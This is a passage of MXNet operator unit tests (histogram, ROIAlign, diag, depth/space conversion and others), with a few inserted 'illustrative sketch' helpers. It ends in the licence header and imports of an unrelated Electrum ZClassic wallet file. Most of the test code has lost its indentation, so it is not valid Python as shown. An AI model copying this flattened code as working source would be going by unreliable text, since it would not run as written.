[backward_expected],
rtol=1e-2 if dtype is np.float16 else 1e-5,
atol=1e-2 if dtype is np.float16 else 1e-5)
# check backward using finite difference
check_numeric_gradient(quad_sym, [data_np], atol=0.001)
@with_seed()
def test_histogram():
def f(x, bins=10, range=None):
return np.histogram(x, bins, range=range)
for ndim in range(1, 6):
shape = rand_shape_nd(ndim)
x = rand_ndarray(shape, stype='default', dtype=np.float64)
mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
np_bins = mx_bins.asnumpy()
bin_cnt = random.randint(2, 10)
bin_range = (-2.5, 2.5)
mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
assert_almost_equal(mx_bins1.asnumpy(), np_bins1)
assert_almost_equal(mx_histo1.asnumpy(), np_histo1, rtol=1e-3, atol=1e-5)
mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
assert_almost_equal(mx_histo2.asnumpy(), np_histo2, rtol=1e-3, atol=1e-5)
assert_almost_equal(mx_bins2.asnumpy(), np_bins2, rtol=1e-3, atol=1e-5)
data = mx.sym.Variable("data")
bins = mx.sym.Variable("bins")
histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
histo2 = mx.sym.histogram(a=data, bins=bins)
executor1 = histo1.bind(ctx=default_context(), args={"data" : x})
executor1.forward(is_train=False)
assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
executor2 = histo2.bind(ctx=default_context(), args={"data" : x, "bins" : mx_bins})
executor2.forward(is_train=False)
assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
def test_op_output_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=False)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check output names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['pooling_output'])
def test_op_all_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=True)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check all names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['data', 'conv_data', 'conv_weight', 'conv_weight', 'conv_bias', 'conv_bias', 'conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['data', 'deconv_data', 'deconv_weight', 'deconv_weight', 'deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['data', 'fc_data', 'fc_weight', 'fc_weight', 'fc_bias', 'fc_bias', 'fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['data', 'lrn_data', 'lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['data', 'act_input0', 'act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['data', 'concat_arg0', 'data', 'concat_arg1', 'concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['data', 'softmax_input0', 'softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['data', 'softmax_input0', 'softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['data', 'upsampling_arg0', 'upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['data', 'pooling_data', 'pooling_output'])
@with_seed()
def test_activation():
shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'relu': [lambda x: mx.sym.Activation(x, act_type='relu'),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'sigmoid': [lambda x: mx.sym.Activation(x, act_type='sigmoid'),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'tanh': [lambda x: mx.sym.Activation(x, act_type='tanh'),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'softrelu': [lambda x: mx.sym.Activation(x, act_type='softrelu'),
lambda x: np.log(1. + np.exp(x)),
lambda x: 1. - 1 / (1 + np.exp(x)),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.Activation(x, act_type='softsign'),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
}
# Loop over operators
for name, op in unary_ops.items():
# Loop over shapes
for shape in shapes:
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
@with_seed()
def test_ravel():
# be aware that check_symbolic_forward will use float type internally
# for the arrays and that limits the representable flat index range.
# Taking dim==4 and a range of [0,..,100] for the data can already
# cause precision issues and break this test.
for dim in [1, 2, 3, 4]:
data = np.random.randint(50, size=(dim, 500))
shape = tuple(np.add(np.amax(data, axis=1), [1]))
a = mx.sym.Variable('a')
ravel_npy = np.ravel_multi_index(data, shape)
b = mx.sym.ravel_multi_index(a, shape=shape)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
# Test with leading dimension set to -1.
        shape2 = (-1,) + shape[1:]
b = mx.sym.ravel_multi_index(a, shape=shape2)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape2)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
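
# Illustrative sketch (not part of the original test suite): the precision
# caveat noted at the top of test_ravel is the kind of issue that appears once
# flat indices exceed what a float's significand can represent exactly; for
# single precision (float32, 24 significand bits) that limit is 2**24:
def _example_float32_index_precision():
    exact_limit = 2 ** 24
    assert np.float32(exact_limit) == np.float32(exact_limit + 1)  # collision
    assert np.float64(exact_limit) != np.float64(exact_limit + 1)  # still exact
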
def test_context_num_gpus():
try:
        # Note: the test is run on both GPU and CPU hosts, so we cannot assert
        # on a specific number here.
assert mx.context.num_gpus() >= 0
except mx.MXNetError as e:
        # Note: on a CPU-only host, CUDA sometimes cannot determine the number
        # of GPUs.
if str(e).find("CUDA") == -1:
raise e
@with_seed()
def test_op_roi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
Assert whether the two data type are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0), []
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
grad = [(y_low, x_low, w1), (y_low, x_high, w2),
(y_high, x_low, w3), (y_high, x_high, w4)
]
return val, grad
def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
position_sensitive, dy):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 5,\
ValueError(
'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
C_out = C // PH // PW if position_sensitive else C
out = np.zeros((R, C_out, PH, PW), dtype=T)
dx = np.zeros_like(data)
drois = np.zeros_like(rois)
for r in range(R):
batch_ind = int(rois[r, 0])
sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
roi_w = T(max(ew - sw, 1.0))
roi_h = T(max(eh - sh, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
for c in range(C_out):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
for iy in range(roi_bin_grid_h):
y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
v, g = bilinear_interpolate(
bdata[c_in], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
# compute grad
for qy, qx, qw in g:
assert_same_dtype(qw.dtype, T)
dx[batch_ind, c_in, qy, qx] += dy[r,
c, ph, pw] * qw / count
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out, [dx, drois]
def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
ctx = default_context()
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
data.attach_grad()
rois.attach_grad()
with mx.autograd.record():
output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
position_sensitive=position_sensitive)
C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
pooled_size, ctx=ctx, dtype=dtype)
output.backward(dy)
real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio,
position_sensitive, dy.asnumpy())
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
assert_almost_equal(data.grad.asnumpy(), dx, atol=1e-3)
assert_almost_equal(rois.grad.asnumpy(), drois, atol=1e-3)
# modified from test_roipooling()
def test_roi_align_autograd(sampling_ratio=0):
ctx = default_context()
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
sample_ratio=sampling_ratio)
x1 = np.random.rand(4, 1, 12, 12).astype('float64')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
[1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'write', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'add', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
test_roi_align_value()
test_roi_align_value(sampling_ratio=2)
test_roi_align_value(position_sensitive=True)
test_roi_align_autograd()
@with_seed()
def test_diag():
# Test 2d input
h = np.random.randint(2,9)
w = np.random.randint(2,9)
a_np = np.random.random((h, w)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k == 0
r = mx.nd.diag(a)
assert_almost_equal(r.asnumpy(), np.diag(a_np))
# k == 1
k = 1
r = mx.nd.diag(a, k=k)
assert_almost_equal(r.asnumpy(), np.diag(a_np, k=k))
# k == -1
k = -1
r = mx.nd.diag(a, k=k)
assert_almost_equal(r.asnumpy(), np.diag(a_np, k=k))
# random k
k = np.random.randint(-min(h,w) + 1, min(h,w))
r = mx.nd.diag(a, k=k)
assert_almost_equal(r.asnumpy(), np.diag(a_np, k=k))
# invalid k
k = max(h,w) + 1
assertRaises(MXNetError, mx.nd.diag, a, k=k)
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# test 1d input
d = np.random.randint(2,9)
a_np = np.random.random((d))
a = mx.nd.array(a_np)
# k is random
k = np.random.randint(-d,d)
r = mx.nd.diag(a, k=k)
assert_almost_equal(r.asnumpy(), np.diag(a_np, k=k))
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d input
x1 = np.random.randint(3,9)
x2 = np.random.randint(3,9)
x3 = np.random.randint(3,9)
x4 = np.random.randint(3,9)
a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k = 0, axis1=0, axis2=1
r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
assert_almost_equal(r.asnumpy(), np.diagonal(a_np, offset=0, axis1=0, axis2=1))
# k = 1, axis1=1, axis2=0
r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
assert_almost_equal(r.asnumpy(), np.diagonal(a_np, offset=1, axis1=1, axis2=0))
# k = -1 axis1=1, axis3=3
r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
assert_almost_equal(r.asnumpy(), np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
# k = 2, axis1=-2, axis2=0
r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
assert_almost_equal(r.asnumpy(), np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
# Test 4d backward, k=0, axis1=3, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=1, axis1=1, axis2=2
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-1, axis1=2, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-2, axis1=1, axis2=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
check_numeric_gradient(diag_sym, [a_np])
@with_seed()
def test_depthtospace():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
y = np.reshape(tmp, [b, c // (blocksize**2), h * blocksize, w * blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
n = random.randint(1, 5)
c = block * block * rand_mul1
h = random.randint(1, 5)
w = random.randint(1, 5)
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.depth_to_space(data, block)
assert_almost_equal(output.asnumpy(), expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c // (block ** 2), h * block, w * block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.depth_to_space(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_depth_dim():
invalid_shape_inp = (n, block - 1, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_space_dim():
invalid_shape_inp = (n, block ** 2, 0, block + 1)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n , c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
test_invalid_depth_dim()
test_invalid_space_dim()
test_invalid_block_size()
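
# Illustrative sketch (not part of the original test suite): the reference f()
# in test_depthtospace rearranges groups of blocksize**2 channels into
# blocksize x blocksize spatial tiles. For a (1, 4, 1, 1) input holding
# [0, 1, 2, 3] and block size 2, the single output channel becomes the 2x2
# tile [[0, 1], [2, 3]] (helper name is an assumption for this example):
def _example_depth_to_space_small():
    x = np.arange(4).reshape(1, 4, 1, 1)
    tmp = np.reshape(x, [1, 2, 2, 1, 1, 1])
    tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
    y = np.reshape(tmp, [1, 1, 2, 2])
    assert (y[0, 0] == np.array([[0, 1], [2, 3]])).all()
    return y
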
@with_seed()
def test_spacetodepth():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
tmp = np.transpose(tmp, [0, 3, 5, 1, 2, 4])
y = np.reshape(tmp, [b, c * (blocksize**2), h // blocksize, w // blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
rand_mul2 = random.randint(1, 4)
n = random.randint(1, 5)
c = random.randint(1, 5)
h = block * rand_mul1
w = block * rand_mul2
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.space_to_depth(data, block)
assert_almost_equal(output.asnumpy(), expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c * (block ** 2), h // block, w // block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.space_to_depth(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_space_dim():
invalid_shape_inp = (n , c, block - 1, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_depth_dim():
invalid_shape_inp = (n, 0, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
test_invalid_space_dim()
test_invalid_block_size()
test_invalid_depth_dim()
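
# Illustrative sketch (not part of the original test suite): with the two
# reference implementations used in the tests above, space_to_depth and
# depth_to_space are inverse rearrangements for compatible shapes, i.e.
# applying one after the other returns the original array:
def _example_space_depth_round_trip(block=2):
    x = np.random.rand(2, 3, 4 * block, 5 * block)
    b, c, h, w = x.shape
    tmp = np.transpose(np.reshape(x, [b, c, h // block, block, w // block, block]),
                       [0, 3, 5, 1, 2, 4])
    s2d = np.reshape(tmp, [b, c * block ** 2, h // block, w // block])
    tmp = np.transpose(np.reshape(s2d, [b, block, block, c, h // block, w // block]),
                       [0, 3, 4, 1, 5, 2])
    d2s = np.reshape(tmp, [b, c, h, w])
    assert np.array_equal(x, d2s)
    return d2s
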
@with_seed()
def test_softmax_cross_entropy():
def f_sm_ce(data, label):
return np.sum(-np.log(data) * label)
data = mx.sym.Variable('data')
label = mx.sym.Variable('label')
sym = mx.sym.softmax_cross_entropy(data=data, label=label)
num_labels = random.randint(100, 200)
batch_size = random.randint(100, 200)
np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
np_sm = np_softmax(np_data)
np_label = np.random.randint(0, num_labels, (batch_size, ))
np_one_hot_label = np.zeros((batch_size, num_labels))
np_one_hot_label[np.arange(batch_size), np_label] = 1.
check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label}, [np.array([f_sm_ce(np_sm, np_one_hot_label)])], rtol=1e-3, atol=1e-5)
@with_seed()
def test_split_v2():
dim = random.randint(2, 6)
shape = rand_shape_nd(dim)
axis = random.randint(-dim, dim-1)
axis_size = shape[axis]
samples = random.randint(0, axis_size - 1)
indices = sorted(random.sample([i for i in range(1, axis_size)], samples))
indices = tuple(indices)
mx_data = rand_ndarray(shape)
np_data = mx_data.asnumpy()
np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
data = mx.sym.Variable("data")
sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
out_grad = [np.ones(arr.shape) for arr in np_out]
check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
@with_seed()
def test_invalid_kernel_size():
invalid_kernel_size = 28
assert_exception(
mx.nd.Correlation,
MXNetError,
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=invalid_kernel_size)
@with_seed()
def test_valid_kernel_size():
valid_kernel_size = 9
mx.nd.Correlation(
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=valid_kernel_size)
@with_seed()
def test_valid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
output_data=mx.nd.Pooling(
input_data,
kernel=kernel,
stride=stride,
pad=(0,0,0),
pool_type='max',
name='pooling',
pooling_convention="same")
assert(math.ceil(input_data.shape[2]/stride) == output_data.shape[2])
@with_seed()
def test_invalid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
pad = 2
assert_exception(
mx.nd.Pooling,
MXNetError,
input_data,
stride=stride,
kernel=kernel,
pad=pad,
pool_type='max',
name='pooling',
pooling_convention="same")
@with_seed()
def test_image_normalize():
# Part 1 - Test 3D Input
shape_3d = (3, 28, 28)
mean = (0, 1, 2)
std = (3, 2, 1)
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][0] = data_expected_3d[:][:][0] / 3.0
data_expected_3d[:][:][1] = (data_expected_3d[:][:][1] - 1.0) / 2.0
data_expected_3d[:][:][2] = data_expected_3d[:][:][2] - 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][0] = 1 / 3.0
grad_expected_3d[:][:][1] = 1 / 2.0
grad_expected_3d[:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 2 - Test 4D Input
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[0][:][:][0] = data_expected_4d[0][:][:][0] / 3.0
data_expected_4d[0][:][:][1] = (data_expected_4d[0][:][:][1] - 1.0) / 2.0
data_expected_4d[0][:][:][2] = data_expected_4d[0][:][:][2] - 2.0
data_expected_4d[1][:][:][0] = data_expected_4d[1][:][:][0] / 3.0
data_expected_4d[1][:][:][1] = (data_expected_4d[1][:][:][1] - 1.0) / 2.0
data_expected_4d[1][:][:][2] = data_expected_4d[1][:][:][2] - 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[0][:][:][0] = 1 / 3.0
grad_expected_4d[0][:][:][1] = 1 / 2.0
grad_expected_4d[0][:][:][2] = 1 / 1.0
grad_expected_4d[1][:][:][0] = 1 / 3.0
grad_expected_4d[1][:][:][1] = 1 / 2.0
grad_expected_4d[1][:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
if __name__ == '__main__':
import nose
nose.runmodule()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight ZClassic client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
from PyQt5.QtGui import *
from PyQt5.QtCore import *
